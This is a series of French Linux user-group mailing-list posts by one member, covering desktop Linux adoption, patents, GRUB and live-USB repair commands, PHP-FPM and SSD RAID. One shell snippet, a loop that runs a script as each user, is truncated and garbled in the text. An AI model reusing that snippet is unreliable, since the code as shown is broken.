Re: [gull] Linux Desktop - fremissement ?

[felix]

Bonjour,

On Fri, Mar 22, 2019 at 12:17:15PM +0100, Daniel Cordey wrote:

> On 22.03.19 10:33, Frederic Dumas wrote:
> > 
> > Linux s'est vautré sur la machine individuelle ou de bureau, ses parts
> > de marché sont de mémoire de 2% les années de grandes eaux. L'analyse de
> > l'échec a été faite 100 fois.
> 
> Oui, c'est un sujet récurrent qui ressort, comme par hasard, chaque fois au
> printemps, avec l'idée que : Cette fois c'est la bonne :-)
> 

D'autant qu'on cherche à comparer un produit commercial - imposé par les
constructeurs (vente conjointe) de PC, et pour lequel des stratégies
marketing sont nourrie avec des masses de dollars - avec un produit libre,
pour lequel il n'existe pas de ``stratégie marketing''.

Considérant cela, 2% d'augmentation en une année, c'est ENORME!

Je vois pour ma part, de plus en plus de gens qui viennent me demander
de leurs ``débarrasser de Windows'' (selon ces termes).

Je me dis que le ``ras-le-bol'' initialement réservé à une partie de la
population (informaticien, complotiste ou réac), tend à se ``démocratiser''.

Je ne ferai pas de pronostics, mais je pense que les prochains mouvements
de statistique risquent de prendre de l'ampleur.

--
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Huawei clone des composants Apple, récompense les employés pour vol de technologie, d'autres concurrents ont aussi été victimes, selon un rapport

[felix]

On Fri, Feb 22, 2019 at 04:54:21PM +0100, Marc SCHAEFER wrote:
> Tiens, la mailing-list de l'EFF traite justement des `patent trolls':

Opportun! Quoique, je doute que le ``PATENT OFFICE'' soit le mieux placé
pour agir puisqu'idéalement je le verrai bien disparaître à terme...

Le truc, c'est qu'il n'existe pas d'autorité capable de prendre ce genre
de décision(ie: rompre des accord internationnaux**). Chaque pays devra
dénoncer le respect des droits de brevets (au niveau national pour commencer)...
(Ce qui semble commencer en Chine ;). 'faudra des bollocks pour tenir tête
à l'international...
**Trump, pourrait!
A suivre...

>https://www.eff.org/effector/32/3
M'enfin rien n'empêche de signer!

> (et en plus ici, c'est effectivement une gesticulation du Schtroumpf,
>  comme dit précédemment).
Rassures-moi: En disant cela, tu qualifies le propos initial du thread?
Je veux dire, les remous et bruits provoqués par Apple et Huawei!?

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Huawei clone des composants Apple, récompense les employés pour vol de technologie, d'autres concurrents ont aussi été victimes, selon un rapport

[felix]

Bonjour Miçhael,

On Thu, Feb 21, 2019 at 05:51:01PM +0100, Miçhael Parchet wrote:
> 
> http://www.developpez.com/actu/246687/Huawei-clone-des-composants-Apple-recompense-les-employes-pour-vol-de-technologie-d-autres-concurrents-ont-aussi-ete-victimes-selon-un-rapport/
> 
> Les technologies copié par Aywaille et aux autres devraient-elles être 
> libre ou protégé par des brevets open source avec des licences qu’on 
> peut acheter ?
Poser ce genre de question sur cette liste est un peu anachronique!
Selon mon point de vue, *tous* les brevets sont devenus contre-productifs!
Durée, interprétations, etc... font que le travail d'ingénieur est de plus
en plus polué et freiné, implique un travail parallel de juriste, etc.
C'est dans l'air du temps: même Elon Musk tiens des propos plutôt réfléchis
sur la chose: (lu sur Le Temps:
  
https://www.letemps.ch/monde/brevets-tesla-rendus-publics-realite-coup-communication

  ``Dans un article reprenant les propos d’Elon Musk, Le Figaro souligne 
le changement d’avis du patron de Tesla concernant les brevets, tout 
juste bons désormais à «freiner le progrès, à permettre à des 
entreprises géantes de camper sur leurs positions et à enrichir les 
avocats»''
)

> Quoi que la manière de faire de Hawaï est vraiment douteuse est 
> discutable voir scandaleuse

Bof, je dirais que ``C'est de bonne *guerre*!''

> Même si peut-être le brevet devrait-t-il avoir des règles plus souple 
> le procédé utilisé par Hawaï devrait-il être interdit ?
Donc, (pour ma part je pense) qu'on devrait arrêter avec ces brevets et
se remettre au boulot. Voyez LibreOffice en concurrence avec OpenOffice,
NGinx en concurrence avec Apache, etc... Ça marche plutôt bien et chacun
y retrouve ses intérêts (en conservant ses billes!).

Ceci n'est que mon propre point de vue. Mais c'est un sentiment que j'ai
depuis mon adolescence et que mon expérience confirme jour après jour.

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Rions un brin : MS blog 331732

[felix]

On finira par le savoir; voici un papier, signé Microsoft, titré:

Les périls à utiliser Internet Explorer comme navigateur par défaut:

The perils of using Internet Explorer as your default browser

https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/.../ba-p/331732

-- 
 Félix Hauri -  - http://www.f-hauri.ch 
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Grub en vrac + kernel panic (ex: grub-install vs update-grub)

[felix]

Re,

On Fri, Feb 08, 2019 at 01:18:02AM +0100, Daniel Cordey wrote:
> Dans ce cas, taper 'e' dans grub (si on n'a pas de prompt shell), ajouter
> 'rw et init=/bin/bash' sur la ligne 'linux' et rebooter. Monter /, éditer le
> fichier /mnt/etc/fstab, modifier le type du file system et finalement
> rebooter.

Perso, je n'ajoute pas `rw' et ajoute `init=/bin/sh' plutôt de bash.
Puis une fois dans le shell, je tapes:

  fsck /dev/partitionRoot# pas systématiquement, mais cela arrive
  mount -o remount,rw /

Par habitude, reflex... Toutes les installations n'ont pas forcément
bash installé, tandis que /bin/sh est ``standard''. Cela peut éviter
un kernel panic.

Pour ce qui est de ``rw'', si je ne l'utilises pas c'est égallement
par habitude, plus qu'autre chose. Mais c'est vrais que dans ``l'ordre
des choses'', on fait un petit check des fs *avant* de le monter en RW.

Mais il est vrai que - sur une machine connue, à plus forte raison sur
ta machine perso - si tu sais que bash est installé et connais les
conditions de ton dernier ``umount'', la syntaxe à Daniel peut faire
gagner du temps.

A+!

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Grub en vrac + kernel panic (ex: grub-install vs update-grub)

[felix]

On Thu, Feb 07, 2019 at 10:19:59AM +0100, Frederic Dumas wrote:
...
> > initrd /@/initrd.cfg (de mémoire, autocompletion)

Décidement je ne connais pas mint:

entre le ``/@/'' et ``.cfg'' je dois dire que j'ai du mal...

Bon, tu parles de kernel panic, mais arrives-tu à dire pourquoi il panique?
  ``initrd not found''
  ``root not found''
  ``cpu too hot''
  ``cff too late''

En principe, tu dois pouvoir lire la raison pour laquelle le kernel
s'est senti perdu.

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] grub-install vs update-grub (Plop Boot Manager sur le MBR)

[felix]

On Wed, Feb 06, 2019 at 12:50:08PM +0100, Frederic Dumas wrote:
> Bonjour,
> ...
> Il me faut peut-être reconstruire son fichier de configuration, à la suite
> de l'installation tardive de Windows en dualboot.
> ...
> inutilisable depuis le live-cd, car elle n'a pas d'option pour s'appliquer
> sur une autre installation de grub que celle du système actif. Est-ce que je
> me trompe ?
Oui et non...

En fait, il faut

 - booter via une live,
 - mount /dev/sda3 /mnt
 - for bind in proc sys dev dev/pts;do mount --bind /$bind /mnt/$bind;done
 - chroot /mnt

Là, tu est dans ton install.

 - mount /boot  # si nécessaire
 - grub-install /dev/sda3 # si boot voir plop (je connais pas)

En souhaitant que cela se passe...

> ...
> Le disque est organisé ainsi :
> 
> /dev/sda  MBR (Plop Boot Manager)
> /dev/sda1 NTFS (Windows 7)
> /dev/sda2 SWAP (Linux)
> /dev/sda3 BTRFS (Linux Mint 19)
> ...
> Il ne s'agit pas ici de réinstaller le bootloader de Grub sur le MBR,
> puisque c'est le gestionnaire de démarrage Plop Linux qui occupe cette
> position. Plop fait un démarrage chaîné sur BOOTMGR pour lancer Windows ou
> sur Grub pour lancer Linux. Cette partie là fonctionne bien. Plop trouve
> bien Grub, mais Grub ne parvient pas à trouver le noyau Linux.

Comprend pas: grub démarre très bien window!?
 
Plop Linux est une distribution!

> Il y a quelques jours, la numérotation des partitions sur le disque était
> différente, elle suivait leur ordre de création : la partition de swap était
> numérotée en /sda3, bien qu'elle ait été placée au milieu du disque, et
> celle de Linux Mint en /sda2, bien qu'elle ait été placée en dernier. Quand
> Windows a écrasé le MBR, il a renuméroté les partitions dans l'ordre de leur
> position sur le disque.
???

> J'imagine que c'est le changement de numéro de la partition BTRFS qui rend
> le noyau Linux introuvable à Grub. Mais il me paraît plus simple de mettre à
> jour la configuration de Grub, que de modifier encore une fois l'ordre des
> partitions dans le MBR. Est-ce vrai ?
Il n'est jamais bon de numéroter les partitions dans le désordre...

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] [gull-annonces] RHL: ça s'approche!

[felix]

Bonjour,

Désolé: essayé, pas pu!

Je ne pourrai pas être présent lors de cet évennement. Fonction de l'état
des routes et de la météo, j'essaierai d'y faire un saut, mais c'est peu
probable.

Je vous souhaite à tous (les gulliens, les swisslinuxiens ainsi qu'à
tous ceux qui liront ces lignes), santé et bonheur pour une excellente
année 2019!

Je continue à maintenir les listes hébergées sur *.linux-gull.ch, sans 
trop de garanties et tant que je sens que c'est utilisé... Pour 
l'instant et jusqu'à nouvel avis. (Ai ajouté SSL via let's encrypt et 
fais tourner mailman en https.)

Pour ma part, je suis toujours prêt à participer aux activités de linuxiens
en suisse, cours (ssh présente plein de nouvelles options sympas, le nouveau
bash V5 arrive, OpenVPN et le routage privé, etc...) ou autres activités.

Dernier mot: à propos de St-Cergue, je pense qu'au mois de janvier, ce
n'est pas le lieu de raliement le plus pratique pour l'ensemble de la
suisse romande. SVP pas de troll! Mais à discuter pour la prochaine!?

On Sun, Jan 13, 2019 at 02:23:06PM +0100, Sébastien Gendre wrote:
> ...
> Concernant l'AG de Swisslinux.org, elle est prévue au dimanche 27
> janvier dès 10:30.
> ...

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Droits d'accès d'un processus

[felix]

On Mon, Jan 07, 2019 at 02:32:21PM +0100, felix wrote:

>  - Lancer la chose via crond, en editant la crontad de CHAQUE utilisateurs
  - Lancer la chose via crond, en editant la crontab de CHAQUE utilisateurs

Sorry.

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Question/problème PHP-FPM

[felix]

Salut Alexis,

On Sun, Jan 06, 2019 at 10:00:44PM +0100, Alexis Domjan wrote:
> ...ne fonctionne plus car il tente d'accéder à des fichiers d'un site B.
>
> Pour résoudre le problème je fait simplement un restart de php5-fpm.
> Mais ça reste très étrange.
> ...
> Comme un redémarrage du serveur web solutionne le problème, c'est qu'il
> doit y avoir un problème avec php5-fpm (configuré en socket via
> /var/lib/php5-fpm/). Le problème se produit toujours entre ces deux sites...
> ...
> Quand ça se produit (ce qui semble assez rare)...

Hmmm...

 $ man php5-fpm |grep log
   tening for CGI requests. Output is logged to /var/log/php-fpm.log.
  SIGUSR1 re-open log file

A tout hasard, cela ne serait pas lié aux rotations de backups?

 # systemctl restart php5-fpm
 ... tests
 # killall -s USR1 php5-fpm
 ... re rests


--
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Droits d'accès d'un processus

[felix]

Bonjour,

On Mon, Jan 07, 2019 at 10:44:38AM +0100, Laurent Franceschetti wrote:
> Bonjour,
> 
> J’aurais une question un peu naive. Je dois lancer un processus 
> centralisé sur une machine debian, qui va faire des compilations pour 
> différents comptes (ou chaque utilisateur a son propre directory et 
> ne doit surtout pas accéder à ceux des autres). Le compilateur 
> génère, comme d’habitude, les fichiers objets dans le même directory 
> que le source.
> 
> Comment dois-je gérer les droits d’accès pour que:
> 
> 1) Le processus de compilation puisse compiler.
> 2) L’utilisateur a bien accès aux fichiers objets créés par le 
>compilateur pour son propre compte, mais pas ceux des autres comptes?


Le faire au nom de l'utilisateur, soit:

 - Lancer la chose via crond, en editant la crontad de CHAQUE utilisateurs

ou

 - Lancer (via cron) un process ROOT qui va faire truc du genre:

while IFS=: read user foo uid gid homedir shell;do
((uid > 999 & 6 > uid )) && su - $user -c /path/to/myscript
  done   -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Raid 1 pour SSD?

[felix]

Bonjour,

Considérant un NAS (du type WD, Iomega, Synology, basé sur Linux) à 2 baies
configuré en RAID 1 (mirror) par défaut. Ce NAS fonctionne 18h/24, 6h/7,
est stoppé et re-démarré ``proprement'' 6x / semaine.
 
On souhaite remplacer les 2 disques HD de 1Tb par 2 disques SSD (de 1TB),
afin d'accélérer la vitesse du serveur, réduire le bruit et probablement sa
consomation (Pas évident! Ce sera prouvé/invalidé avec des appareils de
mesure).

J'ai spontanément pensé que c'est une mauvaise idée de faire du Raid mirror
avec du SSD, mais à présent, je n'arrive pas à comprendre pouquoi j'ai
pensé ça!?

Il y avait les problèmes de ``write-amplification'', mais ceci étant géré par
le firmware du SSD, je ne vois pas comment cela pourrait être agravé par
l'utilisation en raid-1...

En fait, je ne vois pas franchement de contre-indication à faire du raid-1
avec du SSD!?

Est-ce que quelqu'un pourrait me rafraichir la mémoire, m'indiquer ce que
je loupe!?

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Si Linux a de la peine à s'imposer sur le desktop c'est à cause de la fragmentation de l'écosystème, d'après Linus Torvalds

[felix]

Oui,

On Fri, Dec 14, 2018 at 03:31:45PM +0100, Miçhael Parchet wrote:
> 
> http://www.developpez.com/actu/237125/Si-Linux-a-de-la-peine-a-s-imposer-sur-le-desktop-c-est-a-cause-de-la-fragmentation-de-l-ecosysteme-d-apres-Linus-Torvalds/

Bof.

Il faut égallement souligner que ces ``319 déclinaisons'', ``distributions''
ou ``fragmentations'', sont (quasi toutes) des initiatives sans objectif
lucratif, donc sans ``budjet publicité''.

En effet, d'un coté Microsoft vend windows en affirmant que cette version
est la meilleure version (de window) pour votre ordinateur, de l'autre,
Apple présente un outil au design séduisant, avec une réputation de ``ça
marche, c'est plus cher, c'est plus bô, mais surtout: ça marche''...

De plus, les ordinateurs ``grand publique'' sont toujours vendus AVEC 
l'OS préinstallé (vente forcée, vieux sujet.) ce qui tent à rendre plus 
considérable le fait qu'une part croissante des utilisateurs choisissent 
de payer plus cher pour s'affranchir de l'OS vendu (et payé) pour 
utiliser linux (incluant le travail d'installation; le temps c'est de 
l'argent). (Sans parler des 2ème vies de machines qui sont quasi toutes
sous Linux, Mac et PC confondus.)

Et pour finir, 319 concurrent qui, donnent dans l'altruisme et tentent de
convaincre, sans utiliser de matraquage publicitaire et qui, petit à petit,
prennent des parts de marché...

Je pense que cette évolution est bien plus solide que celles qui dépendent
de ``stratégie marketing'': On ne sort pas la nouvelle version parce
qu'on est en automne et que les clients sont en train de renouveler leurs
parcs, on sort une nouvelle version parce qu'elle est ``prête''...

On ne devrait pas comparer des pains on chocolat avec des chocolatines!!

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Vendre Linux [was: gagner sa vie avec le logiciel libre -- was: GPL V3 -> SSPL]

[felix]

On Thu, Nov 08, 2018 at 07:20:52PM +0100, Laurent Franceschetti wrote:

> AMHA, Microsoft n’est pas vraiment malfaisant (comme le sont feu Monsanto ou 
> les 
> vendeurs d’armes/antidépresseurs); Microsoft est juste encombrant et son 
> écosystème sent le moisi.

C'est amusant que tu fasse le parallel avec l'agri culture...
Microsoft à saturé les filières de formations de tous les pays possible en 
``offrant''
les produit microsoft ET les formations, invitant les professeurs à suivre des 
séminaires
à Redmond, tout frais payés... De sorte que nos écoles ne puisse plus être en 
mesure
d'offrir autre chose comme formation, que du MS...

On parle de mono culture...

Pour ce qui est de ``malfaisant'', j'ai été témoin de pratique de sabotage 
industrielle,
de vos de propriété intellectuelle, abus (politique, commercial et technique) de
position dominante (en sabotant les librairies utilisées par les concurents, 
par exemple)
Donc non, je ne pense pas que Mosanto soit ``pire'' que Microsoft... Mais c'est 
un
point de vue personnel.

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Vendre Linux [was: gagner sa vie avec le logiciel libre -- was: GPL V3 -> SSPL]

[felix]

On Fri, Oct 19, 2018 at 06:53:52PM +0200, Miçhael Parchet wrote:
> Bonjour,
> 
> Pouvez-vous me donner des exemples de manière de gagner sa vie avec le 
> logiciel libre ?
> 

Je vend l'installation de linux par forfait!

...Par exemple, mais microsoft est moins cher: 19.99€, 9.99€ en promotion!

https://www.phonandroid.com/windows-10-linux-microsoft-annonce-premiere-distribution-payante-prix-20-euros.html

https://www.microsoft.com/fr-fr/p/wlinux/9nv1gv1pxz6p

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
https://forum.linux-gull.ch/mailman/listinfo/gull

[gull-annonces] Papier toilette

[felix]

Bonjour,

Cette annonce n'a pas grand'chose à voire avec Linux, sinon que l'éditeur
est ACBM, qui produit le ``virus informatique''.

C'est à lire au WC: http://WCactus.com

Et bon, on y parle aussi de blockchain:

  ``Les toilettes, aussi, se mettent à la blockchain''
  
http://www.wcactus.com/1023_Les_toilettes_aussi_se_mettent_a_la_blockchain.html

A lire sur le trône!

  
https://web.archive.org/web/20120126035149/http://milosparipovic.com/wp-content/uploads/iPooToilet.jpg


-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull-annonces mailing list
gull-annonces@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull-annonces

Re: [gull] IBM to acquire Red Hat in deal valued at $34 billion

[felix]

On Mon, Oct 29, 2018 at 06:12:51PM +0100, Marc SCHAEFER wrote:
> > Preuve par 9 du succès de la formule de l???Open Source, ou signe d???une 
> > dérive et d???un déclin? Reste à voir.
> 
> Je vois cela complètement différemment: IBM essaie d'unifier ...
> ...
> IBM va certainement continuer à faire la plupart des choses que Red Hat
> faisait.
> ...
> On verra bien :)
> ...
> D'un autre côté, ça fait 17 ans que je n'ai plus eu besoin ...
> des distributions non Debian en ce qui me concerne...

Merci Marc, excellent, comme d'hab!

Je dirais encore qu'il faut faire très attention au sens ``open source''
ou ``libre'': Toutes ces sociétés (RedHat, IBM, Google, Microsoft, etc...)
sont liée au succès d'une manière vicérale; Il est très important que l'on
parle d'elles. Alors que le monde du libre va bien au delà, n'a pas de
``moyens financier'' pour entreprendre des démarche promotionelles. (sauf
à petites échelles, avec des groupes d'utilisateurs;). Cela le rend
plus résistant car il ne dépend pas, de fait, de moyens financiers!

Par ailleur Debian, puisqu'on en parle, existe et est connu ``par la bande'',
sans réelle publicité, que les fait:
  
https://upload.wikimedia.org/wikipedia/commons/1/1b/Linux_Distribution_Timeline.svg
(tiens, cela fait longtemps que je n'ai pas affiché ce fichier: le logo de
 RedHat à disparu!?)

Je ne pense pas voir un jour Debian ``acheté'' ou ``entrer en bourse'', mais
si cela devait arriver, je partirai avec bien d'autre sur un fork ou un autre.

Comme disait Marc, pour le reste: On verra bien!

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] C'est beau l'amour!

[felix]

Quand on aime on ne compte pas, m'enfin 60'ooo brevets, qui dans l'absolu
sont sans consistance, c'est 60'ooo x rien...

https://www.phonandroid.com/microsoft-offre-6-brevets-linux-beau-amour.html

S'agit-il d'un moyen de ``valoriser'' les brevet qui ne font pas partie
du cadeau?

Jusqu'où iront-ils pour nous prendre pour des c...!?

   `` Il ne faut pas prendre les sampans du pont
 Thieu pour des canots de sauvetage''
- Gotlieb - (Comprenne qui peut!)

Voilà, voilà, voilà...

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Remboursement de Postfinance en cas d'abus

[felix]

Salut,

On Sat, Sep 15, 2018 at 01:06:37PM +0200, Daniel Cordey wrote:
> Toutefois, il est vrai que les conditions de remboursement sont expressément
> liées à un dommage causé par un virus ou un cheval de Troie. C'est vraiment
> hubuesque ! Cette restriction me semble juste un coup de com, car on est là
> justement dans une de ces zones grises, où La Poste va argumenter sur les
> anti-virus utilisés...

J'ai reçu un démarcheur d'assurances de Allianz qui m'a présenté leur
nouvelle formule contre le cyber-risque...

Lui ai demandé si dans les CG, il figurait un chapitre à propos d'anti-virus,
je lui ai alors expliqué que je n'en utilise pas... Nous avons parlé de
chevaux de troie,... Bref, il importe pour le lésé de faire la preuve qu'il
à bien été victime (à l'insu de son plein gré), d'un cheval de troie, d'un
virus ou d'une attaque de pirate...

C'est marrant, je n'ai pas (encore) lu le document que Marc à pointé, mais
je me dis que ces exigences sont vraissemblablement liées à des contrats
d'assurances que Postfinance à dû prendre...

... (pure spéculation, ces propos n'engagent personne, même pas moi!)

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Truc et astuces: bash master-mind

[felix]

Re,

On Wed, Aug 15, 2018 at 08:33:18AM +0200, Daniel Cordey wrote:
> 
> -> Owner    Microsoft (acquisition in progress)
> 
> Pas envie d'être fiché par une société qui continue à agir contre Linux et
> l'open-source (brevets).

Tu l'es déjà!

Ma plus grande crainte par rapport au conflit d'intérêt que représente la
detention de github par microsoft est la propriété intellectuelle.
C'est la raison pour laquelle je publie ``ailleur'' *avant* de publier
sur github...

> Donc, pourquoi pas Gitlab ?

Connais pas, à voir...

Pourquoi pas m'en faire un à moi!?
  ... À voir egallement,

> > Au passage, si l'un de vous à envie d'ajouter des commentaires.
> 
> @Félix :
> 
> Franchement, là, je n'adhère pas... Soit le développeur commente SON code,
> soit il écrit une doc ! Mais demander à d'autres de commenter le code... pas
> cool :-( Nous sommes tous débordés, mais ça ne doit pas être une excuse pour
> ne pas mettre un minimum de commentaires...

Pour ma part, j'ai beaucoup appris en lisant et commentant des codes, parfois
même obfusqués (virus).

Je ne souhaite pas que les commentaire soient l'oeuvre d'un programmeur
chevronné (comme toi;), bien au contraire! D'abord je sais que tu (et
tes pairs) as aut'chose à faire...

Mais surtout, l'aspect pédagogique, j'aurrai du mal à commenter des choses
qui me semblent évidentes, tandis qu'un étudiant placera les commentaires
naturellement au fur et à mesure de sa découverte.

> Je comprends très bien le code, mais je ne commenterai pas le code d'un
> autre, souvent parce que j'écrirais celui-ci autrement. Donc, code écrit
> avec une vision A et commenté par quelqu'un avec une vision B ? Le résultat
> doit être extraordinaire :-)
Encore une fois, cette requête ne s'adressait pas à un programmeur chevronné
mais à un découvreur!

Commenter un code peut être ludique.

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Truc et astuces: bash master-mind

[felix]

Bonjour,

Au passage, si l'un de vous à envie d'ajouter des commentaires,
(dans l'optique pédagogique, je m'engage à valider et/ou répondre)
J'en avais l'intention, mais la reprise est sérieuse et j'ai bcp
de trucs plus ``urgents'', pour l'instant...

On Sun, Aug 12, 2018 at 10:42:56PM +0200, Yves Martin wrote:

> Sympathique.
Merci,

> Par contre, pourquoi ne pas le publier dans un forge afin
> de le rendre plus visible avec un objectif pédagogique ?
Ok, c'est sur:

  https://github.com/F-Hauri/bashMasterMind

> J'ose à peine mentionner GitHub

M'ouais, on fera avec...
Cela dit, c'est un peu pour cela que je préfère ``publier''
à travers la liste du gull AVANT de poster sur github...

> mais si cela ne vous convient pas, vous en trouverez
> une autre.

Mais s'il Te plait, évites le vouvoyement sur la liste, on est
entre nous! ;-)

> Cordialement,
Amicalement, salutations.

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Truc et astuces: bash master-mind

[felix]

Bonjour,

Durant mes vacances, je n'ai pas pu m'empêcher de faire du bash...

Alors pour m'amuser, j'ai créé un ``Master-Mind'', avec

 - possibilité de varier le nombre de couleurs, de position et d'essais,

 - utilisant `tput` (termcap) pour les couleurs et positionnement,

 - utilisant ``rationellement'' $RANDOM (n'utilise qu'une seule
   références à $RANDOM, pour 4 position et 6 couleurs: 6^4 = 1296),

 - utilisant la possibilité de lire STDIN par 1 charactère afin
   d'éviter le ... Et donc, gestion des touches  et .

Du coup, si ce script peut

 - amuser la gallerie,

 - inspirer les aficionados de bash,

  il est bien entendu parsemé de quelques trucs et astuces...

Vous le trouverez sur:

  http://f-hauri.ch/vrac/bash_mastermind.tgz

( Feed-backs bienvenus ;)

-- 
 Félix Hauri  --  http://www.f-hauri.ch

___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Écoutez La philosophie pour sauver le numérique ! - 30.06.2018 dans Podcasts

[felix]

Bonjour,

On Sat, Jun 30, 2018 at 09:58:28AM +0200, Miçhael Parchet wrote:

> Écoutez La philosophie pour sauver le numérique ! - 30.06.2018 de Six 
> heures - Neuf heures, le samedi - La 1ere dans Podcasts. 

> https://itunes.apple.com/ch/...-1ere/id1030740596?...#episodeGuid=9681639

Le ``même'' lien, sans passer par le premier ``A'' de  ``GAFAM'':

https://www.rts.ch/play/radio/six-heures-neuf-heures-le-samedi/audio/la-philosophie-pour-sauver-le-numerique-?id=9681639

( Je me demande ce que id1030740596 peut bien signifier... ;-)

A+!

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Rachat de GitHub par Microsoft : la fondation Linux livre son analyse de la situation et affirme avoir « hâte de voir les améliorations » sur GitHub

[felix]

Hem,

Le (c)rachat par Microsoft, de Github, commenté par...
la fondation Linux, (qui à été rachetée par Microsoft, y'a déjà un moment...)

Ce sont des gentils qui parlent de gentils.

Voilà, voilà...

On Fri, Jun 15, 2018 at 11:45:05AM +0200, Miçhael Parchet wrote:
> 
> http://www.developpez.com/actu/208325/Rachat-de-GitHub-par-Microsoft-la-fondation-Linux-livre-son-analyse-de-la-situation-et-affirme-avoir-hate-de-voir-les-ameliorations-sur-GitHub/

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Clé USB bootable

[felix]

Bonjour,

J'arrive un peu tard...

On Wed, Jun 13, 2018 at 09:03:52AM +0200, Grégoire Métral wrote:
> Jusqu'à la dernière version LTS d'Ubuntu, j'utilisais UNetbootin pour
> crééer mes clés USB bootables à partir d'ISO (et pas forcément des

On Wed, Jun 13, 2018 at 10:15:30AM +0200, Grégoire Métral wrote:
> Le 13. 06. 18 à 09:34, Alexandru Pelin a écrit :
> > # dd bs=4M if=ubuntu.iso of=/dev/sdx conv=fdatasync
>
> Ça marche bien, mais ça me réduit ma clé à la taille de mon ISO (avec
> UNetbootin, si mon image faisait 300 MB et ma clé 64 GB, j'avais encore

On Wed, Jun 13, 2018 at 11:12:10AM +0200, Marc SCHAEFER wrote:
> J'utilise ça depuis 2008 (à voir la date dans le CVS pour la
> version originale)
> 
> http://cvs.alphanet.ch/cgi-bin/cvsweb/schaefer/public/packages/simple-scripts/scripts/make-boot-flash?rev=HEAD;content-type=text%2Fplain
Wow,

Mais si je lis bien, tu n'installe pas une image de clef bootable!?

La réponse de Alexandre est correcte, mais incomplète.

Après avoir ``posé'' l'image d'un disque (cdrom) ``partitionné''
sur la clef, il faut ajouter une partition (ou deux), avec ``parted''
ou similaire...

(A ma connaissance, on ne peut pas ``redimensionner'' les partitions
 de la clef, car:
  .1 C'est de l'iso, pas du fat ni de l'extX
  .2 Il y a une seconde partition UEFI juste après la première.
)

extrait de mon script
  http://f-hauri.ch/vrac/live-install.sh.txt
(Nota: ce script était basé sur live-helper mais de debian wheezy,
 il servait à créer une partition de persistence chiffrée.)

(J'ai testé la fonction usbKeyChoose qui fonctionne bien! 
 $ . <(sed '/^usbKeyChoose()/,/^}/p;/DIALOG=/p;d' /tmp/live-install.sh)
 $ usbKeyChoose
 $ echo $STICK
 sdx
)

Les lignes 335 à 352 servent à ajouter une seconde partition.
ATTENTION! Avec UEFI, le disque contient DÉJÀ une seconde partition
 $ sed '/Adding.*part/,/^)/p;d' live-install.sh 

Mais pas sûr que cela se passe correctement avec ``parted'' actuellement...

Sinon simplement:

 (A faire en root! Attention à ce que ${STICK}1 ne soit pas monté!!!)

 # fdisk /dev/$STICK <<< $'n\np\n\n\n\nw'

ajoutera une partition à $STICK.

Ensuite formater cette partition, la monter et ajouter ``union''
(voire les lignes 370 à 374:)

 # mkfs.ext4 -L persistence /dev/${STICK}3
 # mount /dev/${STICK}3 /mnt
 # echo '/ union' >/mnt/persistence.conf
 # sync
 # umount /mnt

En gros...

-- 
 Félix Hauri  --  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
